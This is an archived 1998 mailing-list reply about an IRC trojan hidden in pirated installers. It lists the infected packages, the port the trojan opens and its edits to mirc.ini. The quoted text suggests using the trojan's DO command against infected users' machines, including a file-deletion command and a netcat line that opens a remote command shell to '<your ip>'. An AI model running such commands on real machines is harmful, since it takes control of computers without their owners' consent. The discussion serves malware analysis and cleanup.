Re: Internet Wide DOS Attack using IRC

From: Samuel Cossette (clusterat_private)
Date: Sat Oct 03 1998 - 11:41:54 PDT

    It's not the DO command of mirc, it's a buildin command, it's the equivalent
    of /QUOTE or /RAW in a irc client, this is send the data directly to the
    server

    At this time I have found 2 directly file infected:

    Packet Handler Firewall and FlashFXP v1.0, both distributed on a XDCC bot on
    #warez950-dcc. In a zip file with some fake .nfo and a SETUP.EXE (oce.exe)
    of 354k. quicktools.ocx (EZFTP OLE Control Module), Mswinsck.ocx are also
    included.

    Another interesting thing, the server open the port 15150, this is prompt:
    Enter your username:, probably a FTPD

    The trojan can also modify you mirc.ini, this is add auto-op, and modify
    your current script.

    >With the DO command enabled, they gave us the means to remotely disable
    >this trojan.
    >
    >Something to the effect of;
    >
    >msg <nick> .do del c:\windows\system\oce*.*
    >
    >Then, msg <nick> .do <some evil command to lock up the machine, forcing a
    >reboot>.

    >The mIRC DO command is very powerful, and can be used to install netcat on
    >the remote machine. We could then .msg <nick> <path to netcat>\nc.exe -L
    >-p <any port> <your ip> -t -e command.com, giving a remote command prompt
    >to investigate/disinfect the machine.

    ___
    >George Imburgia                                      e-mail:
    gtiat_private
    >Systems Administrator                                Phone:  (302)739-4068
    >Delaware Technical & Community College               Fax:    (302)739-3345
    >Office of the President                              Pager:  (302)741-5962

    Samuel Cossette
    clusterat_private